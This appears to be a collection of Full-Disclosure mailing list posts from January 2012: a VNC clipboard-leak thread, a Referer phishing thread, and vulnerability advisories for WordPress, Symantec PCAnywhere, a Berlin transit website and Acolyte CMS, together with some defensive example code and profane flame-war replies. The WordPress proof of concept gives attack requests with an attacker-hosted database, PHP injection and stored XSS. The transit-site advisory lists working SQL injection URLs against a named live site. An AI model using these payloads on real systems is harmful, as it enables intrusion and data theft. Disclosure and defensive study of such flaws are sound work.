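        self._local = initial   # current local clipboard text
        self._sent = None       # last text actually transmitted

    def _sync(self):
        if self._local is None or self._local == self._sent:
            return []
        self._sent = self._local
        return [client_cut_text(self._local)]

    def connected(self):
        """Called once after the handshake; on_copy pushes what is already there."""
        return self._sync() if self.policy == "on_copy" else []

    def local_copy(self, text):
        """Called whenever the local desktop clipboard changes."""
        self._local = text
        return self._sync() if self.policy == "on_copy" else []

    def paste_requested(self):
        """Paste button pressed, or Ctrl-V typed while the viewer has focus."""
        out = self._sync() if self.policy == "on_paste" else []
        if self.send_paste_key:
            out += ctrl_v()
        return out


def cut_texts(messages):
    """Clipboard strings a server would receive from these messages."""
    texts = []
    for m in messages:
        if m[0] == CLIENT_CUT_TEXT:
            (length,) = struct.unpack(">I", m[4:8])
            texts.append(m[8:8 + length].decode("latin-1"))
    return texts


def simulate(policy):
    """Copy a secret for a local app, then copy and paste text into the remote."""
    bridge = ClipboardBridge(policy, initial=INITIAL)
    wire = bridge.connected()
    wire += bridge.local_copy(SECRET)   # never meant for the remote machine
    wire += bridge.local_copy(WANTED)
    wire += bridge.paste_requested()
    return cut_texts(wire)


if __name__ == "__main__":
    for policy in ClipboardBridge.POLICIES:
        print(policy, simulate(policy))
```

With `on_paste` the server only ever sees the one string the user deliberately pasted; with `on_copy` it also receives the pre-connection clipboard and the local-only secret.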
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
fuckoff you ragdoll... i dont troll, and many on this fucking list know it... fuckit... i aint paying shit to anyone on this list, enjoy finding your 0days, and, the next admins, go ahead and rm me, coz i will be dropping your ass of a FD, until it makes me. go die, and, maybe, you wont have money, and then, maybe, you will have 10 wives, with 10 kids. now go eat a burger. rat
On 25 January 2012 21:38, Christian Sciberras uuf6...@gmail.com wrote: No, I only read the manual. Now go troll somewhere else. :)
On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote: Windows is even more secure, have you actually, read any of the code /
On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On Windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris.
On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them.
On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote:
On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged.
I don't think that is what Ben is saying. The clipboard gets sent to the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So whatever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report makes complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =)
-- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
and stupidly, you forgot to add in the second PRIVT post i sent you, saying i meant *insecure :) now, go try tell me windows vnc is secure again...and, then setup a vnc on your box, and, under win32, try your best, when you're ready, yell out, so i can make a complete fucking fool of ya. ok ? if this is how you want to play, i am challenging you, if i can own a shitty windows setup you 'secure' as best you can, here on fd, is this trolling is it ? its a challenge... maybe, if you read the lame rfb and, pixelisation via IP KVM, unfortunately for windows, it aint any different, a pixel is placed at X or Y, and, you can place data calls to it, from server which, could be, my bot :) want more proof,...keep going with my challenge then.
On 25 January 2012 21:38, Christian Sciberras uuf6...@gmail.com wrote: No, I only read the manual. Now go troll somewhere else. :)
On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote: Windows is even more secure, have you actually, read any of the code /
On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On Windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris.
On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them.
On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote:
On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged.
I don't think that is what Ben is saying. The clipboard gets sent to the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So whatever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report makes complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =)
-- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] Using HTTP referer for phishing attacks
yea yea, we got it now, ill say one thing to FD, your all putting, one really cool thing i was doing, to a halt. enjoy, ask zx2c4 about it.
On 25 January 2012 21:09, Jerome Athias jer...@netpeas.com wrote: This could be also used in some cases to Refer requests from paypal or such payment systems when there is no/bad validation checks on an e-commerce website. ie: if(Referer.Contains("paypal.com")) { ok } but what if i control mypaypal.com?
On 24/01/2012 20:14, Jan Wrobel wrote: Hi, Sorry if this is not new, but I didn't manage to find any mention of such a technique. In short: HTTP referer field contains information where the web user is coming from, which is often a trusted site such as a web search. Having such information, a malicious web site can use several tricks to fool the user into thinking that he or she returned to the referring site. In fact, the user is taken to a generic phishing site that intercepts all data exchanged between the user, the referring site and sites visited from the referring site. More detailed write up with few examples is here: http://mixedbit.org/referer.html Cheers, Jan
-- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art.
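The substring check quoted in the message above, set beside a check that parses the header and compares the exact host. This is an added example, not code from the thread; the trusted-host set and the sample Referer values (other than mypaypal.com, which the message names) are constructed.

```python
from urllib.parse import urlsplit

# Assumption: the hosts this hypothetical shop expects the payment provider to use.
TRUSTED_HOSTS = frozenset({"paypal.com", "www.paypal.com"})

# Constructed Referer values; the first is the legitimate case.
SAMPLES = [
    "https://www.paypal.com/cgi-bin/webscr",
    "https://mypaypal.com/checkout",          # the case raised in the message
    "https://paypal.com.shop.example/",       # trusted name as a subdomain label
    "https://shop.example/?next=paypal.com",  # trusted name in the query string
    "https://paypal.com@shop.example/",       # trusted name as userinfo
]


def referer_contains(referer):
    """The check from the message: substring match anywhere in the header."""
    return "paypal.com" in referer


def referer_host_matches(referer, trusted=TRUSTED_HOSTS):
    """Parse the header as a URL and require https plus an exact host match."""
    try:
        parts = urlsplit(referer)
        host = parts.hostname          # lower-cased, without userinfo or port
    except ValueError:                 # e.g. malformed IPv6 literal
        return False
    if parts.scheme != "https" or host is None:
        return False
    return host.rstrip(".") in trusted


def bypasses(samples=SAMPLES):
    """Values the substring check accepts but the host comparison rejects."""
    return [s for s in samples
            if referer_contains(s) and not referer_host_matches(s)]


if __name__ == "__main__":
    for s in SAMPLES:
        print(referer_contains(s), referer_host_matches(s), s)
```

Even the exact-host version only validates a header the client chooses to send, so it narrows the spoofing cases above without turning Referer into proof that a payment happened.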
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
For the record... who are the other 'many on this list' that know you don't troll other than your alter egos? 'course you don't troll can you quote me where I ever said VNC is secure? With that, I'll let you troll in peace. I have no interest talking to you anyway... :)
On Wed, Jan 25, 2012 at 12:04 PM, GloW - XD doo...@gmail.com wrote: and stupidly, you forgot to add in the second PRIVT post i sent you, saying i meant *insecure :) now, go try tell me windows vnc is secure again...and, then setup a vnc on your box, and, under win32, try your best, when you're ready, yell out, so i can make a complete fucking fool of ya. ok ? if this is how you want to play, i am challenging you, if i can own a shitty windows setup you 'secure' as best you can, here on fd, is this trolling is it ? its a challenge... maybe, if you read the lame rfb and, pixelisation via IP KVM, unfortunately for windows, it aint any different, a pixel is placed at X or Y, and, you can place data calls to it, from server which, could be, my bot :) want more proof,...keep going with my challenge then.
On 25 January 2012 21:38, Christian Sciberras uuf6...@gmail.com wrote: No, I only read the manual. Now go troll somewhere else. :)
On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote: Windows is even more secure, have you actually, read any of the code /
On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On Windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris.
On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them.
On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote:
On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged.
I don't think that is what Ben is saying. The clipboard gets sent to the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So whatever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report makes complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =)
-- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
The vendor was notified. They have chosen not to fix the issue at this time. The Vendor Response section has the details:
Vendor Response: Due to the fact that the component in question is an installation script, the vendor has stated that the attack surface is too small to warrant a fix:
We give priority to a better user experience at the install process. It is unlikely a user would go to the trouble of installing a copy of WordPress and then not finishing the setup process more-or-less immediately. The window of opportunity for exploiting such a vulnerability is very small.
However, Trustwave SpiderLabs urges caution in situations where the WordPress installation script is provided as part of a default image. This is often done as a convenience on hosting providers, even in cases where the client does not use the software. It is a best practice to ensure that no installation scripts are exposed to outsiders, and these vulnerabilities reinforce the importance of this step.
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Henri Salo
Sent: Tuesday, January 24, 2012 5:48 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Tue, Jan 24, 2012 at 04:09:16PM -0600, Trustwave Advisories wrote:
Trustwave's SpiderLabs Security Advisory TWSL2012-002: Multiple Vulnerabilities in WordPress
https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt
Published: 1/24/12
Version: 1.0
Vendor: WordPress (http://wordpress.org/)
Product: WordPress
Version affected: 3.3.1 and prior
Product description: WordPress is a free and open source blogging tool and publishing platform powered by PHP and MySQL.
Credit: Jonathan Claudius of Trustwave SpiderLabs
Finding 1: PHP Code Execution and Persistent Cross Site Scripting Vulnerabilities via 'setup-config.php' page.
CVE: CVE-2011-4899
The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. This typically requires a user to have valid MySQL credentials to complete. However, a malicious user can host their own MySQL database server and can successfully complete the WordPress installation without having valid credentials on the target system. After the successful installation of WordPress, a malicious user can inject malicious PHP code via the WordPress Themes editor. In addition, with control of the database store, malicious Javascript can be injected into the content of WordPress yielding persistent Cross Site Scripting.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance
1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306
2.) Performs POST/GET Requests to Install WordPress into MySQL Instance
Request #1
--
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81

dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit
Request #2
--
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT
3.) Get PHP Code Execution
Malicious user edits 404.php via Themes Editor as follows:
<?php phpinfo(); ?>
Note #1: Any php file in the theme could be used.
Note #2: Depending on settings, PHP may be used to execute system commands on webserver.
Malicious user performs get request of modified page to execute code.
Request
---
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
4.) Get Persistent Cross Site Scripting
Malicious User Injects Malicious Javascript into their own MySQL database instance
MySQL Query
---
update wp_comments SET comment_content='<script>alert('123')</script>' where comment_content='Hi, this is a comment.<br />To delete \ a comment, just log in
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Wed, Jan 25, 2012 at 08:43:34AM -0600, Trustwave Advisories wrote: The vendor was notified. They have chosen not to fix the issue at this time. The Vendor Response section has the details: Vendor Response: Due to the fact that the component in question is an installation script, the vendor has stated that the attack surface is too small to warrant a fix: We give priority to a better user experience at the install process. It is unlikely a user would go to the trouble of installing a copy of WordPress and then not finishing the setup process more-or-less immediately. The window of opportunity for exploiting such a vulnerability is very small. However, Trustwave SpiderLabs urges caution in situations where the WordPress installation script is provided as part of a default image. This is often done as a convenience on hosting providers, even in cases where the client does not use the software. It is a best practice to ensure that no installation scripts are exposed to outsiders, and these vulnerabilities reinforce the importance of this step.
There are A LOT of these open installation pages on the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply a patch if we create one as a collaborative effort. I would be more than happy to help create a patch for this if this is the case.
- Henri Salo
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There are A LOT of these open installation pages on the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply a patch if we create one as a collaborative effort. I would be more than happy to help create a patch for this if this is the case.
I may have missed something, but does simply having the file exposed make you vulnerable? From looking at it, it starts off with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have.
Tim
-- Tim Brown mailto:t...@65535.com
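An audit a hosting provider could run over its own document roots to find WordPress copies whose installer has not been completed, mirroring the file_exists() guard described in the message above. This is an added example, not WordPress or Trustwave code; the directory layout is constructed, and the rule that a wp-config.php one level up only counts when that parent has no wp-settings.php of its own is an assumption about the guard.

```python
import os
import tempfile


def is_unfinished_install(wp_root):
    """True if setup-config.php is present and no wp-config.php guards it."""
    setup = os.path.join(wp_root, "wp-admin", "setup-config.php")
    if not os.path.isfile(setup):
        return False
    if os.path.isfile(os.path.join(wp_root, "wp-config.php")):
        return False
    parent = os.path.dirname(os.path.abspath(wp_root))
    config_above = os.path.isfile(os.path.join(parent, "wp-config.php"))
    parent_is_install = os.path.isfile(os.path.join(parent, "wp-settings.php"))
    # Assumption: a config one level up protects this copy only when the
    # parent directory is not itself a separate WordPress install.
    if config_above and not parent_is_install:
        return False
    return True


def find_unfinished_installs(base):
    """Walk a tree of document roots and list unfinished installs, relative to base."""
    hits = []
    for dirpath, _dirnames, _filenames in os.walk(base):
        if is_unfinished_install(dirpath):
            hits.append(os.path.relpath(dirpath, base))
    return sorted(hits)


def demo():
    """Build a constructed hosting layout and audit it."""
    with tempfile.TemporaryDirectory() as base:
        def touch(*parts):
            path = os.path.join(base, *parts)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            open(path, "w").close()

        # customer1: installer finished, config next to the code.
        touch("customer1", "wp-admin", "setup-config.php")
        touch("customer1", "wp-config.php")
        # customer2: default image shipped with WordPress, never set up.
        touch("customer2", "blog", "wp-admin", "setup-config.php")
        # customer3: config kept one level above the install.
        touch("customer3", "wp-config.php")
        touch("customer3", "public", "wp-admin", "setup-config.php")
        # customer4: finished install with an unconfigured copy nested inside.
        touch("customer4", "wp-config.php")
        touch("customer4", "wp-settings.php")
        touch("customer4", "wp-admin", "setup-config.php")
        touch("customer4", "staging", "wp-admin", "setup-config.php")
        return find_unfinished_installs(base)


if __name__ == "__main__":
    for path in demo():
        print("installer still open:", path)
```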
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Dear full-disclosure I wrote to you to tell you about serious serious vulnerability in all Windows versions. If you turn machine on before system is configured, then you be able to set user password yourself, big gaping hole I make big large botnet to fully utilise this impressive vulnerability! thegrugq said i could sell this for like 3 ferrari's and 1 russian wife, i say nay though! Big time russian mobster offer me diamond, i say nay! I like report vuln of this size responsibility in so hope to make more money^H^H^H^H^H^H^Hsecure world. Please full-disclosure, this vuln is serious and i plead you shut down all windows now. I wrote metasploit module! It find new installs turned off machine, WOL and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many wifes!
On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote:
On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There are A LOT of these open installation pages on the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply a patch if we create one as a collaborative effort. I would be more than happy to help create a patch for this if this is the case.
I may have missed something, but does simply having the file exposed make you vulnerable? From looking at it, it starts off with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have.
Tim
-- Tim Brown mailto:t...@65535.com
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Yes it does. wp-admin/setup-config.php?step=1 on any wp install where it exists gives this:

The file 'wp-config.php' already exists one level above your WordPress installation. If you need to reset any of the configuration items in this file, please delete it first.

On Wed, Jan 25, 2012 at 4:11 PM, Julius Kivimäki julius.kivim...@gmail.com wrote:
> Funny but no, this does not need a non-installed wordpress.
>
> 2012/1/25 Benji m...@b3nji.com
> > Dear full-disclosure
> >
> > I wrote to you to tell you about serious serious vulnerability in all Windows versions. If you turn machine on before system is configured, then you be able to set user password yourself, big gaping hole I make big large botnet to fully utilise this impressive vulnerability! thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i say nay though! Big time russian mobster offer me diamond, i say nay! I like report vuln of this size responsibility in so hope to make more money^H^H^H^H^H^H^Hsecure world.
> >
> > Please full-disclosure, this vuln is serious and i plead you shut down all windows now. I wrote metasploit module! It find new installs turned off machine, WOL and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many wifes!
> >
> > On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote:
> > > On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:
> > > > There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case.
> > >
> > > I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have.
> > >
> > > Tim
> > > --
> > > Tim Brown mailto:t...@65535.com
[Full-disclosure] ZDI-12-018 : Symantec PCAnywhere awhost32 Remote Code Execution Vulnerability
ZDI-12-018 : Symantec PCAnywhere awhost32 Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-018
January 25, 2012

-- CVE ID:
CVE-2011-3478

-- CVSS:
9.7, AV:N/AC:L/Au:N/C:C/I:C/A:P

-- Affected Vendors:
Symantec

-- Affected Products:
Symantec PCAnywhere

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec PCAnywhere. Authentication is not required to exploit this vulnerability.

The flaw exists within the awhost32 component which is used when handling incoming connections. This process listens on TCP port 5631. When handling an authentication request the process copies the user supplied username unsafely to a fixed-length buffer of size 0x108. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM account.

-- Vendor Response:
Symantec has issued an update to correct this vulnerability. More details can be found at:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120124_00

-- Disclosure Timeline:
2011-08-16 - Vulnerability reported to vendor
2012-01-25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Tal zeltzer

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:
http://twitter.com/thezdi
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
On Wed, Jan 25, 2012 at 2:55 AM, Ben Bucksch n...@bucksch.org wrote:
> Dear coderman, posting mails that were explicitly marked offlist on the public list is no-go.

you must be new around here... why not let everyone learn from your fail?
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
What was the offlist message he was referring to? Cause yeah, he sounds pretty new here with that kind of message. People bring in outside conversations all the time, especially if they feel it is relevant to the topic at hand.

Speaking of the topic at hand: I agree with the crowd that says it is not explicitly a security bug, but more like a lack of a good feature. It should be off by default, and someone on the list already made a patch to remove the clipboard which you shouldn't be using for sensitive information while connected to untrustworthy computers anyways. The developers should be notified that they need the feature to turn clipboard sharing off, but if they don't, choose a different vnc and be on your way.

I don't view it as a security bug because it's a policy bug. It's not something where this problem exists ergo I can exploit it, it's a problem where if they do something stupid, I can take advantage of it, and oh hey their client by default doesn't mitigate this.

And before someone yells at me for how I separate software bugs and policy bugs by pointing out something like a client side attack: I view such things as a mix. Policy bug that they are falling for it, and software bug for the actual exploit.

And really this is a good example of a situation where if you are worried about this you have bigger problems. Why must you use vnc? Why is what you're connecting to untrustworthy? What information is directly at risk if the box you're connecting to is compromised? What information is indirectly at risk? Does the box running suspicious programs have access to the internet? Etc. Once you start going down the list on things that should be done, the need to worry about this kind of bug becomes less and less relevant. Meaning if this kind of problem IS relevant then I would almost bet money that you are doing other things really wrong and so an attacker or a bad app doesn't need to use this because they got far more easier and more rewarding things to try.

On Jan 25, 2012 9:45 AM, coderman coder...@gmail.com wrote:
> On Wed, Jan 25, 2012 at 2:55 AM, Ben Bucksch n...@bucksch.org wrote:
> > Dear coderman, posting mails that were explicitly marked offlist on the public list is no-go.
>
> you must be new around here... why not let everyone learn from your fail?
[Full-disclosure] Verkehrsbetriebe Berlin - SQL Injection Vulnerability
Title:
======
Verkehrsbetriebe Berlin - SQL Injection Vulnerability

Date:
=====
2012-01-25

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=138

VL-ID:
======
138

Introduction:
=============
VBB Verkehrsverbund Berlin-Brandenburg GmbH. The VBB coordinates the interests of the various partners and shapes the development of a high-performance integrated local public transport system in Berlin.

(Copy of the Vendors Homepage: http://www.vbbonline.de/)

Abstract:
=========
An anonymous researcher discovered a critical SQL Injection Vulnerability on Berlins VBB Verkehrsbetriebe.

Report-Timeline:
================
2011-02-09: Vendor Notification 1
2011-03-06: Vendor Notification 2
2011-04-13: Vendor Notification 3
2012-01-25: Vendor Response/Feedback
2012-01-25: Vendor Fix/Patch
2012-01-25: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
A critical SQL Injection Vulnerability is detected on VBBs Verkehrsverbund Berlin-Brandenburg GmbH Website. The vulnerability allows remote attackers to inject own sql statements on the affected application/dbms. The successful exploitation can result in website defacements, data lost, manipulation of content module destruction.

Vulnerable Modules:
[+] Language ID

Pictures:
../sql1.png
../sql2.png

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers without user interaction. For demonstration or reproduce ...

File: index.php
Para: ?cat=2sCat=392id_language=

References:
http://www.vbbonline.de/index.php?cat=2sCat=392id_language=-1 union select 1,2,3,4,5,version()/*
http://www.vbbonline.de/index.php?cat=2sCat=392id_language=-1%20union%20select%201,2,3,4,5,database%28%29/*

Reference(s):
http://www.vbbonline.de/intern/static/index.php

Risk:
=====
The security risk of the sql injection vulnerability is estimated as critical.

Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri & Pim J.F.P. Campers

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012|Vulnerability-Lab

--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com
[Full-disclosure] Acolyte CMS v1.5 and v6.3 - SQL Injection Vulnerabilities
Title:
======
Acolyte CMS v1.5 and v6.3 - SQL Injection Vulnerabilities

Date:
=====
2012-01-25

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=397

VL-ID:
======
397

Abstract:
=========
A Vulnerability Laboratory researcher discovered a critical (remote) SQL Injection and a persistent XSS on the Acolyte CMS v1.5.3 and v1.6.3.

Report-Timeline:
================
2012-01-25: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

